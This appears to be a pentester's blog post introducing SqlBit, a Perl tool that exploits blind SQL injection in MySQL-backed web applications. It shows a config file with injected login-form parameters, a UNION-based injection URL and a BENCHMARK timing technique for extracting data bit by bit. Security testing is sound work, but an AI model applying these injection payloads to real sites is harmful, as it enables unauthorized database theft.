SqlBit – a new blind SQL injection exploiter

SqlBit is a tool that can be used to execute arbitrary queries on a MySQL database and view the results by exploiting a blind SQL injection vulnerability on the web application that uses that database. It extracts data bit by bit. SqlBit can be downloaded and used freely from here.

You can run SqlBit like this:

perl    sqlbit.pl    “arbitrary SQL query”

Example:

perl    sqlbit.pl    “SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ “

This application was written in Perl so it can run anywhere you have a Perl interpreter (Windows, Linux, etc). It is fully customizable by using a configuration file config.txt where you can set many parameters from the HTTP request. The configuration file looks like this:

HTTP_Method=POST
URL=http://www.vulnerabile-site.com/login.php
HTTP_VERSION=HTTP/1.1
Host=www.vulnerabile-site.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Paros/3.2.13
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Proxy-Connection=keep-alive
Referer=http://www.vulnerabile-site.com/index.php
Cookie=PHPSESSID=776a2e7181af170e7d57f51773b9527b
Content-Type=application/x-www-form-urlencoded
Content-Length=21
param: user=j’ and ($SQL$) — ‘
param: password=xxx

You can see that SqlBit requires a place where it can put a valid SQL query. You should previously test that this query gets executed successfully. This place must be specified by the string $SQL$.

That’s all about the functionality of SqlBit. If you want to know more, here is some background information:

During some of my pentests I encountered blind SQL injection vulnerabilities. I tried to use a few tools that were supposed to exploit them but none of them reached my expectations. So I decided to write my own tool and here it is.

As you may already know, blind SQL injection is when you can’t see the result of a query but it gets executed successfully on the server side. For instace:

httx://www.vulnerable-site.com/view.jsp?page=13′ limit 0 union select 1,2,3 from dual where 1 — ‘

This can be specified in SqlBit configuration file as:

param: page=13′ limit 0 union select 1,2,3 from dual where $SQL$ — ‘

If the URL above produces the same output as the legitimate URL:

httx://www.vulnerable-site.com/view.jsp?page=13

it might be because the parameter page is not filtered correctly and we can inject SQL commands. But we cannot always see the output of our SQL commands because of the application internal logic or other reasons.

In this case we can use a timing attack that is based on this MySQL query:

SELECT IF (expresion, true, false)

where expression is a query that returns true or false. In the true case we can sleep (BENCHMARK) a certain amount of time while in the false case we return directly. This way we are able to know if a bit of data is 0 or 1.

By automating the requests, we can extract data from the database bit by bit.

Enjoy!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: